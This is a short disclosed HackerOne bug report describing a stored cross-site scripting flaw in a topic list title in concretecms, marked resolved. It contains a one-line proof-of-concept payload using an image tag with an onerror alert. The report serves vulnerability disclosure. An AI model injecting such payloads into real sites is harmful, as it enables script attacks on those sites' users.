Stored XSS in Title of the topic List

Disclosed: 2015-07-08 18:35:48 By ishahriyar To concretecms
Unknown
Vulnerability Details
Xss payload saved permanently in Title of the topic List. Poc : "><img src=x onerror=alert(1)>
Actions
View on HackerOne
Report Stats
  • Report ID: 50626
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report